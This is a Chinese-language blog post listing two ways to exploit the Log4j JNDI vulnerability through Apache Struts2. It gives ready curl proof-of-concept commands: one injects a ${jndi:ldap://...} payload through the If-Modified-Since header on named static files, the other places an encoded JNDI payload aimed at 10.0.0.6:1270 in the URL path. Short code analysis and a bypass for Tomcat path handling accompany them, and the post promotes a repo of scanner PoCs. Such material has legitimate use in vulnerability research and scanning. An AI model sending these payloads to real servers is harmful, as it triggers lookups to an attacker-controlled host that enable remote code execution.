- 前言
- 一、第一个利用点poc
- 代码分析
- 二、第二个利用点poc
- 代码分析
- Github
前言
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的可利用点。
一、第一个利用点poc
curl -vv -H "If-Modified-Since: ${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js代码分析
Struts2 framework 存在一些各种UI组件的静态文件,管理这些的是DefaultStaticContentLoader类,以下为漏洞触发点代码:
protected void process(InputStream is, String path, HttpServletRequest request, HttpServletResponse response) throws IOException { if (is != null) { Calendar cal = Calendar.getInstance(); // check for if-modified-since, prior to any other headers long ifModifiedSince = 0; try { ifModifiedSince = request.getDateHeader("If-Modified-Since"); } catch (Exception e) { LOG.warn("Invalid If-Modified-Since header value: '{}', ignoring", request.getHeader("If-Modified-Since")); }
可以发现我们通过设置If-Modified-Since即可利用log4j漏洞,目前可利用的静态文件:
- tooltip.gif
- domtt.css
- utils.js
- domTT.js
- inputtransfersselect.js
- optiontransferselect.js
二、第二个利用点poc
curl -vv http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/代码分析
代码触发点在DefaultActionMapper类文件,这个类尝试解析URI后调用对应的action。
protected String cleanupNamespaceName(final String rawNamespace) { if (allowedNamespaceNames.matcher(rawNamespace).matches()) { return rawNamespace; } else { LOG.warn( "{} did not match allowed namespace names {} - default namespace {} will be used!", rawNamespace, allowedNamespaceNames, defaultNamespaceName ); return defaultNamespaceName; } }
但是还有一个问题就是tomcat会将//识别为/,这里就需要将payload进行转变,最后可以使用
$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
Github
我将上面的利用点编写了goby的扫描脚本,同时有大量最新安全漏洞poc,欢迎大家一起交流。
地址在:https://github.com/aetkrad/goby_poc
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)